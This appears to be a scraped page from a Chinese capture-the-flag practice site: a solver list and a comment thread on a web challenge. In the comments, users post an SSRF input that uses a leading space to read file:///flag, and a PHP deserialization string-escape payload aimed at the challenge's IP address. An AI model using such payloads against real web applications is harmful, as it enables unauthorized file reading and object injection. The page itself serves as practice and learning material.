评分(7)
解题动态
passimoo 攻破了该题 13小时前
qq1002517 攻破了该题 4天前
李逍遥逛霍格沃茨 攻破了该题 8天前
shuiniu221 攻破了该题 8天前
藏在云层里的羊 攻破了该题 11天前
WindZQ 攻破了该题 13天前
瑞雪兆丰年 攻破了该题 14天前
ctfcaiji9527 攻破了该题 14天前
icecreammm 攻破了该题 14天前
Fbug 攻破了该题 23天前
seyana 攻破了该题 23天前
SkyAsh 攻破了该题 24天前
luck1219 攻破了该题 27天前
陌兮li 攻破了该题 1月前
Exercise111 攻破了该题 1月前
eason2023 攻破了该题 1月前
言寺介 攻破了该题 1月前
LL77 攻破了该题 1月前
cxy666777 攻破了该题 1月前
评论
Archer7 3年前
举报
index.cgi/?name= file:///flag
lysandria 3年前
举报
挺难的。ssrf的header头可以用空格逃逸。
15338641414 3年前
举报
?name=%20file:///flag
zhougaoleng 4年前
举报
"User-Agent" 那一栏提示curl,终端中使用curl空格然后加协议。可能后台代码判断开头空格识别是否为协议
lengf 4年前
举报
www,太难了,看着wp我都做了好久,序列化和字符串逃逸,ssrf。。。
a2cai 4年前
举报
PHP字符逃逸和SSRF,我不会看WP做的...记到小本本里待学!
hhtctf2 4年前
举报
username=\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0&password=1";O:4:"evil":2:{s:4:"hint";s:8:"hint.php";} 为什么不行啊,页面没变化
hhtctf2 4年前
举报
http://114.67.246.176:11474/ username=\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0&password=1";O:4:"evil":2:{s:4:"hint";s:8:"hint.php&quo
4thrun 4年前
举报
空格逃逸闭合哈哈
BSOD 4年前
举报
这cgi是什么鬼啊